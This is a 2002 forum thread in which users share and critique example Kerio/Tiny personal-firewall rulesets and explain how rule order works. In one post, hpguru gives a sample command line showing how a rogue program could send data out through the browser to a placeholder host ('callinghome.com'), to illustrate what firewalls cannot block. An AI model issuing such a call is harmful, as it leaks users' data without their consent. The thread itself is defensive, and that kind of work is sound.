how-to block ads
|
BlitzenZeus
Burnt Out Cynic
Premium,MVM
join:2000-01-13
Beaverton, OR
 ·Verizon FIOS
 ·Verizon Online DSL
|  Just one example of rules
This goal of this is to give you one example of how to configure your rules, for normal usage.
DHCP
If your on 56k dial-up, or on a static configuration you don't need these two rules. Please see the FAQ on how to configure them securely if you do need them.
FAQ »Security »How do I allow DHCP?
FAQ »Security »Trick: Make Kerio find my ISP's DHCP server for me...
DNS
I chose to use the custom address group for my dns since I have multiple providers, and that forces you to make many rules to cover just one area. I also share the range with one icmp rule so it makes that easier too....
FAQ »Security »What is a custom address range?
Normally you make two rules, one for each DNS server, and some configurations only have one if your using a routed configuration for example.
FAQ »Security »How do I allow DNS?
ICMP
Here's a link to help configure icmp to your needs, and I suggest you make a toggle rule to make yourself pingable when you need to be. You might even go as far as to make to rules for certain sites to be able to ping you anytime like DSLR/BBR's line monitoring.
POST »Example ICMP rules
IGMP
A protocol used for lan, and most people do not need to accept it. If you need to, you can easily restrict it to which sites you must accept it from.
Loopback
Here I have two loopback rules for example only, one for a normal configuration, and the other if your using any kind of program that uses your localhost as a proxy. If the default loopback rule is used with a software proxy you can't control which programs can get out through the proxy, and that means they can bypass your firewall. So for software proxy users, you need to use the udp loopback rule only.
POST »Simple loopback solution for software proxy users
XP Services Block (Custom to my config)
I use XP, and there are services I can't shutdown that are listening all the time so I made a rule to make sure that any packets to those ports are blocked.
IE
Its a very good idea to restrict ports, but the only problem here is you will be prompted for sites that uses non-default ports, along with ftp communications.... I prefer it this way since I do not trust IE to have free access to the higher port ranges. If necessary you can add ports to the list that are frequently used like 8080 if you use a remote proxy, etc...
Its a very bad idea, but if you don't want to be prompted for any of IE's outbound actions you would have to allow it outbound on any tcp port only.
Outlook/OE
If you use the standard mail/news servers this config is what your looking for. If you use the imap mail service, just add that port to the list after you prompted for it.
The only problem here is mail like hotmail, and images that are linked to in your mail like webbugs. Those will not work, but that is for your protection. If you open the message, and their webbug loads...... You have just verified your e-mail address!
WMP
Its restricted to the two ports used to open media from the net, and the second rule is disabled till I need it when I listen to streaming services that actually require I enable this rule.
The last rule..
My block all inbound blocks what is not already being permitted, but the fact is that Tiny/Kerio will block packets to non-listening ports anyway so you shouldn't see much action with the rule disabled. I prefer to keep it disabled, but I can enable it whenever I want.
Its inbound only since I want to be prompted for any new outbound communications not already permitted.
 PLEASE don't post your rules asking for help with them, or questions about anything other than these rules. In these cases please start your own thread so people can help you with your ruleset since every ruleset is different.
--
When you don't listen to the White Hats, you eventually figure out you just made another Grey/Black Hat turn against you.... - BlitzenZeus
[text was edited by author 2002-03-30 16:47:26] | |
Skipdawg
The Original
Premium,ExMod 2001-03
join:2001-04-19
The Void |  That is looking very good. Thanks for sharing that with us.
--
Proud United States Navy Veteran. | |
gwion
wild colonial boy
Premium,ExMod 2001-08
join:2000-12-28
Pittsburgh, PA
| reply to BlitzenZeus
Well done. Thanks, indeed. I hope nobody minds if I ask that we do keep this thread aimed at example rule sets, maybe even try to deliberately create an archive thread that can be used as a reference, and a potential source for new FAQ material? I can preview a few of the newer FAQ screenshots, here, too. Thanks BlitzenZeus... 
--
Aye, sun and moon and star, all,
And further add to that
That, being dead, we rise,
Dream and so create
Translunar paradise. | |
BlitzenZeus
Burnt Out Cynic
Premium,MVM
join:2000-01-13
Beaverton, OR
·Verizon FIOS
·Verizon Online DSL
| The above is an generic adaptation from my current rules, and is extremely edited...
My current rules are much more complex, and I have deleted/edited many of the rules for the above example to be generic enough so they would not be special to my config. So any examples submitted should be generic in nature.
We have all seen how generic the default rules are, so what we need to explain is how to use the complex configuration were offering so a person starting out can understand them, and provide links when necessary.
Edit: Even my last example I was using is extremely edited from my current ruleset...
--
When you don't listen to the White Hats, you eventually figure out you just made another Grey/Black Hat turn against you.... - BlitzenZeus
[text was edited by author 2002-03-30 19:27:12] | |
Sentinel
Premium
join:2001-02-07
Florida | reply to BlitzenZeus
Yes. Very nice blitz! This will help a lot of new users.
--
AL | |
pompeyfan
Premium
join:2001-12-25
Australia
| reply to BlitzenZeus
Thats a great starting point for new users. Is it worth giving them suggested rules for other commonly used software such as Antivirus software, Adaware, Whois software, etc or do you think people should just be encouraged to use the rule assistant to shape these rules?
--
Pompey Rock, Saints suck | |
BlitzenZeus
Burnt Out Cynic
Premium,MVM
join:2000-01-13
Beaverton, OR
·Verizon FIOS
·Verizon Online DSL
| reply to BlitzenZeus
Amendment
The 'XP TCP Services Block rule (log)' is mis-labled due to user-error. Most of the XP services are tcp, but a couple are udp. The rule also shows its blocking both protocols so the rule should be renamed 'XP Services Block (log)'...
Also note the change in the loopback example here. The first udp rule is always active, and you only enable the second tcp loopback rule if your not using a software proxy.
--
When you don't listen to the White Hats, you eventually figure out you just made another Grey/Black Hat turn against you.... - BlitzenZeus
[text was edited by author 2002-04-04 18:55:08] | |
hpguru
Curb Your Dogma
Premium
join:2002-04-12
| reply to BlitzenZeus
Re: Just one example of rules
Your localhost loopback rules, aside from being unnecessarily restrictive (localhost communications are benign) don't offer any protection against unauthorized applications using your software proxy. They do stop access to the proxy if the second localhost rule is disabled but when it is enabled, any application that uses IEs connection settings will be able to connect out via your proxy unimpeded by your firewall. A proxy is a firewall tunnel after all.
I have 4 loopback rules (see the attachment) but for most folks using a software proxy, 2 will do just fine.
The first loopback rule implicitly permits TCP/UDP from any localhost port to any localhost port in the range from 1 to 79. Interprocess communications on the local machine aren't likely to use that port range but if used it will be unimpeded and so I won't suffer from mysterious crashes and/or errors resulting from blocking the proper functioning of my system.
The second loopback rule simply logs TCP connections to localhost:80 where eDexter an ad blocker listens. If you do not use eDexter then set the "remote" range of the first rule to 1-8079 (if your proxy listens on localhost:8080, otherwise the end point would be Your_Proxy_Port-1).
The third rule implicitly permits TCP/UDP from to any localhost port in the range from 81 to 8079 where most localhost activity lives. If you do not use eDexter you can eliminate this rule.
The forth rule implicitly permits TCP/UDP from any localhost port to any localhost port in the range from 8081 to 65535. If you are not using eDexter this would be your second loopback rule.
Now please note the absence of any rule allowing implicit access to localhost:8080 where the proxy listens. Without such a rule no application that uses IEs proxy settings will be able to connect out via the proxy unless you explicitly permit it to do so. You'll also note that the "PROXY" rules defined for my 3 browsers only permit TCP connections to a single address and a single port, localhost:8080.
These rules aren't perfect but when it comes to security there is no such animal. These rules will not stop an app from connecting out via your default browser. One simple way of accomplishing this would be for a rogue app to execute a command line such as
iexplore »callinghome.com/x=your-data-goes-here&gotcha
Firewalls cannot stop that if the browser is permitted access, but I use Proxomitron and a couple of filters to one, restrict access to all but a few sites when I'm not actively searching the web and two, to prevent certain data from leaving my computer via the proxy. I don't want to stay off topic so I won't get into that but it is a very secure setup and I would encourage anybody using a local proxy such as Proxomitron to follow suit.
Just my 2 cents. | |
BlitzenZeus
Burnt Out Cynic
Premium,MVM
join:2000-01-13
Beaverton, OR
·Verizon FIOS
·Verizon Online DSL
| Hi hpguru
You have to read the example rules, their captions, and all the information/links I provide below. Please keep in mind this example is for beginners...
Even though user error came into play to duplicate udp again in the correction, the caption was "No Software Proxy". So it was already pointed out, and above in the first post there was a link that lead to more information about proxy configurations.
These rules are only a start if the person is looking for some guidance. That is why I have many links to the FAQ's, and a few referenced posts.
You do have an interesting method of using the loopback to control, but most of all your rules look like a good example of how to control your programs with a software proxy. They should be helpful for some people looking to configure their system for a proxy, and are looking at the different possible configurations
--
If con is the opposite of pro, is Congress the opposite of progress? - George Carlin | |
hpguru
Curb Your Dogma
Premium
join:2002-04-12
| reply to BlitzenZeus
Well I must admit I didn't follow all of your links. I've got about 25% packet loss trying to connect here so it's a little on the slow side. As usual, your advice is sound.
As you can see I've made the switch to Kerio out of concerns for the aging technologies employed by Conseal and AtGuard. I feel protected but I hate Kerios log with a passion. Too hard on the eyes. Even so I think Kerio and Prox make a good combo. | |
BlitzenZeus
Burnt Out Cynic
Premium,MVM
join:2000-01-13
Beaverton, OR
·Verizon FIOS
·Verizon Online DSL
| Yeah, Kerio, and Proxo are both free while providing excellent security when configured correctly
This is getting a bit off-topic now, and I'm trying to keep this particular thread on topic. However i'll end this with a suggestion since its hard for you to read the logs...
There is always opening the log file in your favorite text editor(notepad), or Tiny Log Viewer which is customizable:
»hem.passagen.se/pluppis/dator_eg···ram.html
--
If con is the opposite of pro, is Congress the opposite of progress? - George Carlin | |
gwion
wild colonial boy
Premium,ExMod 2001-08
join:2000-12-28
Pittsburgh, PA
| reply to BlitzenZeus
Again, this thread is developing very useful overtones. Thanks for contributing, hpguru, and welcome aboard. Again, I'll remind everyone, let's keep this thread as a repository for working rules and suggestions/FAQ potential material... great job. Anyone needing help with rules, or an analysis of a ruleset, please start a new thread, so you can have the attention you deserve. We'll keep this as a "rule bank," where various approaches and techniques can be posted for reference... thanks, again...
--
I haven't a particle of confidence in a man who has no redeeming petty vices.
- Mark Twain, a Biography | |
LuckiSm0kez
join:2001-08-28
Mountain View, CA
| reply to BlitzenZeus
I found that the ICMP blocking rule interfered with one of my applications. I solved the problem by moving the ICMP blocking rule to the end of the list. Without getting into the specifics of my situation, can you comment about where to place application rules within your rule set and the best way to deal with conflicts between a general rule and an application. For example, I could also have split my application rule into two rules and just moved the application rule pertaining to ICMP packets above the blocking rule. | |
gwion
wild colonial boy
Premium,ExMod 2001-08
join:2000-12-28
Pittsburgh, PA
| reply to BlitzenZeus
Remember the parsing model of the firewall, process until match is found, apply the matching rule, and STOP DEAD. Nothing below it is processed. Multiple rules is a means of implementing conditional loops in this firewall, and there's no "right" order, in a generic sense, long as it works. Make a flow chart, if that helps... every node will have exactly two possible paths, "matched," which will ALWAYS lead to a dead end, "apply this rule and quit processing", or "not matched", which will flow to the next rule... make sense?
generally, I organize my own rules something... roughly... like this:
- LAN rules and local network compatability
- DNS/DHCP/general connectivity
- ICMP
- any needed "bunkering' rules for proxies, etc.
- a general loopback rule, if desired.
- applicationrules
---first, apps that may need an inbound connect
---next, a rule blocking and logging all inbounds.
---finally, all apps that require only an outbound connection.
-a final "kill all" for unattended operation.
But ordering isn't a matter of convenience or readability, it's the order the firewall will process in... if a rukle ABOVE your rule is applied to your traffic, the rules below it are never parsed. So you have to use your judgement, and do a little logic work... simple binary 0/1, false/true, thinking is applied... if you can look at a rule and a certain traffic type and say "true" that rule gets applied... doesn't matter WHAT you put UNDER it; that packet's already processed... Elvis leaves the building just as soon as the firewall can say "true" to any rule it hits...
--
We have not the reverent feeling for the rainbow that the savage has, because we know how it is made. We have lost as much as we gained by prying into that matter.- A Tramp Abroad | |
BlitzenZeus
Burnt Out Cynic
Premium,MVM
join:2000-01-13
Beaverton, OR
·Verizon FIOS
·Verizon Online DSL
| reply to LuckiSm0kez
-Please start your own thread if you can't figure out this problem yourself with the recent information given...
--In the case of icmp, the allow rules must go before any icmp/"any" protocol non-application blocking rules since icmp is not currently application based. Icmp allow rules can go anywhere in the ruleset except after icmp/"any" protocol non-application blocking rules unless the placement is intentional as most blocking rule are.
--I prefer application rules after the system rules for the obvious reason that you don't have to make these rules again for each application. I make the DNS, DHCP, and Loopback rules first, and proceed with the application rules.
Always consider the cause, and effect if every rule...
--Does it block a communication a program needs to allow?
--Does it allow a communications i'm trying to block?
--Will it block communications I need to allow in the future?(If so, make it logging, or toggle it off when you need to.)
If someone has something to add to the thread, ask me, or Gwion(If he's willing..) to review the information before posting it as the goal of this thread is to provide useful example rulesets...
--
If con is the opposite of pro, is Congress the opposite of progress? - George Carlin
[text was edited by author 2002-04-18 18:32:57] | |
gwion
wild colonial boy
Premium,ExMod 2001-08
join:2000-12-28
Pittsburgh, PA
| reply to BlitzenZeus
I'm not sure that wasn't a good entree, though, to some very good info, that it REALLY is important to keep repeating... though I do agree with preserving this as a "developed rules and theory" thread.... and taking the questions to separate threads of their own... not just to keep this one open for samples, but so your question gets the individual attention that gets answers... but there does always remain a MAJOR caveat with this firewall, and I don't hesitate to repeat it over and over (and it applies to almost all ruleset based parsing engines, firewalls, proxies, http server permissions, and whatever, so it's not that Kerio-specific... and the caveat is that the BEST rules put together in the WRONG order are sometimes as bad as the WORST rules. So, indeed, I think any discussion of rules needs to contain a reminder of the "walk the list, in order, until a match is found, apply the match and move to the next job" is critical, in a complete discussion... just so we keep the specific queries about "my ruleset" in their own threads... remember, you aren't going to get a lot of attention from others who might want to help if you post to a "general" thread like this, and then, later, when you or someone else has a similar issue, it won't be as easy to search back for the posts... makes sense to me... carry on, then, ladies and gentlemen.
--
We have not the reverent feeling for the rainbow that the savage has, because we know how it is made. We have lost as much as we gained by prying into that matter.- A Tramp Abroad | |
LuckiSm0kez
join:2001-08-28
Mountain View, CA
| reply to BlitzenZeus
Thanks for the info. I had already solved my problem before posting and was not in need of individual help. My intention was to encourage the dissemination of wisdom that would would help beginners who were trying to apply your rule set. My apologies for misunderstanding the intention of this thread, though I personally feel that your response is a valuable contribution to this thread. | |
|
